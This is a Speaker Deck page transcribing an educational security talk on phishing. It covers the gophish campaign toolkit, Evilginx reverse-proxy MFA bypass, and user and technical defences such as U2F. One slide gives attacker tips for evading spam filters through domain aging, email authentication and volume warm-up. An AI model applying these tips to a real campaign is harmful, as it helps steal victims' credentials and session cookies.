Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Advanced Phishing Attacks

Mahesh Bheema
June 02, 2022
Education
0
230

Advanced Phishing Attacks

Mahesh Bheema

June 02, 2022
Tweet

Other Decks in Education

See All in Education
2409_CompanyInfo_Hanji_published.pdf
yosukemurata
0
330
Padlet opetuksessa
matleenalaakso
4
12k
Introduction - Lecture 1 - Human-Computer Interaction (1023841ANR)
signer
PRO
0
1.7k
HCI Research Methods - Lecture 7 - Human-Computer Interaction (1023841ANR)
signer
PRO
0
700
HCL Domino 14.0 AutoUpdate を試してみた
harunakano
0
1.6k
LLMs for Social Simulation: Progress, Opportunities and Challenges
wingnus
1
100
Comment aborder et contribuer sereinement à un projet open source ? (Masterclass Université Toulouse III)
pylapp
0
3.2k
Introduction - Lecture 1 - Web Technologies (1019888BNR)
signer
PRO
0
4.9k
1106
cbtlibrary
0
410
Repaso electricidade e electrónica
irocho
0
190
勉強する必要ある?
mineo_matsuya
2
1.5k
Evaluation Methods - Lecture 6 - Human-Computer Interaction (1023841ANR)
signer
PRO
0
690

Featured

See All Featured
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
250
21k
Building Your Own Lightsaber
phodgson
103
6.1k
Building an army of robots
kneath
302
42k
Typedesign – Prime Four
hannesfritz
40
2.4k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
25
1.8k
Visualization
eitanlees
145
15k
RailsConf 2023
tenderlove
29
900
Git: the NoSQL Database
bkeepers
PRO
427
64k
Facilitating Awesome Meetings
lara
50
6.1k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
Designing for humans not robots
tammielis
250
25k

Transcript

  1. Advanced Phishing Attacks - @0xmahesh n|u Hyderabad May-2022

  2. About Me: Mahesh Bheema @0xmahesh • Lead Security Testing Engineer

    • 9+ Years of experience in Infosec domain • Speaker & Trainer at local infosec communities • Chapter Leader of Null Hyderabad - Open Security Community

  3. Agenda • Phishing and its types • Phishing Campaigns with

    gophish • Demo - gophish • Issues with email delivery • MFA Phishing with Evilginx • How Evilginx works • Demo – Evilginx. • Identifying Phishing mails • Protection Against Phishing • Questions Disclaimer: This session is purely for educational purpose. Speaker/null assume no liability and is not responsible for any misuse of this knowledge.

  4. What is Phishing • Phishing attacks are the practice of

    sending fraudulent communications that appear to come from a reputable source, these communications are designed to lure a victim. • The goal is to steal sensitive data like credit card and login information, or to install malware on the victim’s machine

  5. Common Types of Phishing • Email Phishing • Vishing/Smishing •

    Spear Phishing • Whaling • Angler Phishing

  6. Traditional Phishing Flow

  7. Gophish – Phishing Toolkit • Phishing campaigns help adversaries to

    perform phishing against large group of people at once. • This also helps them to track whether emails are sent, opened and clicked, etc.. • Help to capture passwords. • Helps with statistics of the campaign, also generates excel reports.

  8. DEMO gophish – Open Source Phishing Toolkit

  9. Overcoming Common Issues with Email Delivery Most of the newly

    created domains are flagged as spam. So, plan accordingly. Create domains and email prior at least 1-2 months prior to attack, this will help bypass few spam filters. Authenticate your email with SPF, DKIM, and DMARC Warm up your domain and scale up email send volume gradually Avoid Spammy words in subject or email

  10. Evilginx • evilginx is a man-in-the-middle attack framework used for

    phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys. • With Evilginx there is no need to create your own HTML templates. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. • Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties.

  11. MFA Phishing and the logic behind

  12. Logic behind MFA Phishing • Evilginx utilizes the concept of

    reverse proxying to efficiently relay traffic back and forth between phished users (e.g., targeted employees) and real websites (e.g., authentication providers). • This positioning allows Evilginx to act as a man-in-the-middle and capture raw credential information without the attacker having to clone fake pages or do heavy lifting. Besides maintaining the server itself, most of the configuration necessary is in the Evilginx YAML files that tell it how to act on a per-domain basis.

  13. DEMO: MFA Phishing with evilginx

  14. Recognizing a Phishing attempt • User education § Unusual Sender

    § Sense of Urgency/Threatening § Typos, improper grammar § Too Good To Be True § Hyperlinks/Attachments § Lookalike domain names (ĸ is not really k) • Spam Filters

  15. Sample Phishing Mail

  16. Protect against phishing attacks • User education • Spam Filters

    • MFA/Hardware keys • U2F (Universal 2 Factor) devices U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. • Microsoft Conditional Access App Control: It performs additional checks that blocks evilginx such as: IP address, Domain Join Membership, etc.

  17. References/Credits • https://breakdev.org/evilginx-2-next- generation-of-phishing-2fa-tokens/ • https://docs.getgophish.com/user-guide/ • https://www.itgovernance.eu/blog/en/the- 5-most-common-types-of-phishing-attack •

    https://thecloudtechnologist.com/2019/04 /29/defending-against-evilginx2-in-office- 365/ • https://www.mailmodo.com/guides/increa se-email-deliverability • Images are taken from google, credit goes to the original creators.

  18. Questions Thanks for your time!